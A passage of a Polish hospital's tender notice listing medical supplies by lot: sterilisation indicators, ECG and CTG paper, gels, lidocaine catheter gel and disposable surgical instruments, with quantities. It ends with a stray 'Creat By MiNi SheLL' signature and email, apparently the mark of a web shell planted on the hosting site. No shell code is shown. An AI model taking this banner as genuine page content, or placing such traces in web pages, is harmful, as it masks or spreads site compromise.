15.	Wskaźnik wieloparametrowy do sterylizacji parą wodną - niesamoprzylepny z 1  powierzchnią umożliwiającą kodowanie( jedna strona bez śliskiej powierzchni)   - CONTROL - KLASY VI   7/20 /posiadają odpowiednie parametry potrzebne do kontroli autoklawów pracujących  obecnie w Centralnej Sterylizator	op.	250 szt. 	10
16.	Osłonki przeźroczyste do narzędzi 45 mm - 50mm	op.	100szt. 	2
17.	Osłonki przeźroczyste do narzędzi 25 - 30 mm 	op.	100 szt. 	12
18.	Osłonki przeźroczyste do narzędzi 10 - 15 mm 	op.	100 szt. 	28
19.	Metkownica 3 rzędowa numeryczna (+ 2 rolki etykiet podwójnie przylepnych ze wskaźnikiem procesu sterylizacji parowej przstosowanej do metkownicy /rol. 500 etykiet/)	kpl. 	1	1
20.	Etykiety podwójnie przylepne ze wskaźnikiem procesu sterylizacji parowej przystosowanej do metkownicy 3 rzędowej numerycznej (alfanumerycznej)	rolka	500 etykiet	6
21.	Podajnik do taśm wskaźnikowych - podajnik wskaźnikowych z krawędzią ułatwiającą dozowanie taśmy	szt	1	2
22.	Testy do kontroli zgrzewu - do zgrzewarki taśmowej  	op.	250 szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 -  Żele, papiery do EKG, KTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Papier do EKG  E-30 /kratka/ Multicard, siatka milimetrowa, zapis termiczny,  szer. 100 mm 	rol.	40 m	1
2.	Papier do EKG Ascard 3 /kratka/ siatka milimetrowa, zapis termiczny,  szer. 104 mm 	rol.	40 m	31
3.	Papier do EKG Ascard 5 /kratka/siatka milimetrowa, zapis termiczny,  szer. 58 mm 	rol.	25 m	2
4.	Papier do EKG Midicard /kratka/ siatka milimetrowa, zapis termiczny,   szer. 130 mm	rol.	25 m	50
5.	Papier do EKG RA 4 B 56 Ascard 4, siatka milimetrowa, zapis termiczny,  szer. 112 mm	rol.	25 m	520
6.	Papier do KTG  HP, M1911A 150mm x 100mm 	op.	150 arkuszy	270
7.	Papier do KTG Sonicaid Oxford, 143 mm x 150mm 	op.	300 arkuszy	55
8.	Papier do Sony UPP- 210 SE, szer. 210 mm	rol.	25 m	1
9.	Papier termiczny do defibrylatora Lifepak  11 RS 100, szer. 107 mm	rol.	25 m	55
10.	Papier termiczny do defibrylatora Lifepak z nadrukiem, szer. 50mm 	rol.	30 m	14
11.	Papier termiczny do videoprintera Mitschubischi - orginalny, K 61B, szer. 110 mm	rol.	20 m	4
12.	Papier termiczny do videoprintera Mitschubischi - orginalny, K 65 HM-CE, szer. 110 mm 	rol.	20 m	260
13.	Pasta do przygotowania naskórka pod elektrody EKG	op.	160 g	10
14.	Żel do EKG	op.	250 ml	24
15.	Żel do USG	op.	500 ml	650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Zamknięty system do nawilżania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1. 	Pojemniki jednorazowe  z wodą sterylną, ze sterylnym łącznikiem do dozowników, z możliwością stosowania przez okres 30 dni u wielu pacjentów	op.	 poj. 320-350 ml	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Paski fluoresceinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Paski fluoresceinowe  do stosowania w okulistyce 	op.	100 szt	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Olej do wiertarek chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Olej do wiertarek chirurgicznych spry 	op.	300 ml.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Żel do gastroenterologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	 Żel nawilżający do gastroenterologii /Endolan/  dopuszcza się produkt równoważny.	op.	poj 200 ml	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Jałowy żel do cewnikowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Jałowy żel znieczulający zawierający 2% chlorowodorek lidokainy, 0,05% dichlorowodorek chlorhexydyny do cewnikowania, endoskopu, zgłębników w jednorazowych ampułko-strzykawkach.	op.	25 ampułko-strzykawek po 10 - 12 ml	20
2.	Jałowy żel znieczulający zawierający 2% chlorowodorek lidokainy, 0,05% dichlorowodorek chlorhexydyny do cewnikowania, endoskopu, zgłębników w jednorazowych ampułko-strzykawkach.	op.	25 ampułko-strzykawek po 5 - 6 ml	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Zestawy chirurgiczne jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Jednorazowe nożyczki chirurgiczne ostro-ostre proste wykonane z metalu, matowe, z wyraźnym znacznikiem  określającym jednorazowość dł  13cm	szt.	1	25
2.	Jednorazowe nożyczki chirurgiczne ostro-tępe zagięte ,wykonane z metalu, matowe z wyraźnym znacznikiem  określającym jednorazowość dł 14,5cm	szt.	1	25
3.	Jednorazowe nożyczki chirurgiczne preparacyjne zagięte ,wykonane z metalu, matowe z wyraźnym znacznikiem  określającym jednorazowość dł 14,5cm	szt.	1	25
4.	Nożyczki opatrunkowe wykonane z metalu, matowe, z wyraźnym znacznikiem  określającym jednorazowość  dł 16cm	szt.	1	75
5.	Pęseta anatomiczna  standardowa prosta wykonana z metalu, matowa, z wyraźnym znacznikiem  określającym jednorazowość dł 14cm	szt.	1	50
6.	Pęseta chirurgiczna standardowa prosta wykonane z metalu, matowa,  z wyraźnym znacznikiem  określającym jednorazowość dł 14cm	szt.	1	50
7.	Kleszczyki anatomiczne zagięte typu Halsted-Mosquito wykonane z metalu z wyraźnym znacznikiem  określającym jednorazowość, matowe dł 12.5cm	szt.	1	50
8.	Kleszczyki  typu kocher wykonane z metalu z wyraźnym znacznikiem  określającym jednorazowość, matowe dł 14cm	szt.	1	25
9.	Imadło chirurgiczne typu Mayo-Hegar wykonane z metalu z wyraźnym znacznikiem  określającym jednorazowość, matowe dł 14cm	szt.	1	75
10.	Zestaw jednorazowy ambulatoryjny do zakładania szwów zawierający min 1x pęseta metalowa chirurgiczna 12 cm, 1x pęseta metalowa anatomiczna 12 cm tampony z gazy bawełnianej wielkości śliwki, 1 x imadło chirurgiczne 12 cm, 1 x nożyczki zakrzywione metalowe ostro/ostre 11 cm, 1x serweta włókninowa 50cm/50cm z przylepnym otworem 5cmx 10 cm, 1 x  serweta włókninowa nieprzylepna 60cmx60cm, opakowanie tyou blister z 3 wgłebieniami na płyny ma posłuzyć jako pojemnik na odpadki, wszystkie komponenety zestawu są jednorazowegop użycia	szt.	1	300
11.	Zestaw jednorazowy ambulatoryjny do zdejmowania szwów zawierający: 1x 3 x tupfery włókninowe wielkości śliwki, 1 x pęseta anatomiczna metalowa 12 cm, 1x pęseta plastikowa 12,5 cm, 1 x ostrze skalpel 6.5 cm typu sierp (zapakowane) tacka typu blister z wgłebieniem na płyny, może posłużyć jako pojemniki na odpadki	szt.	1	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com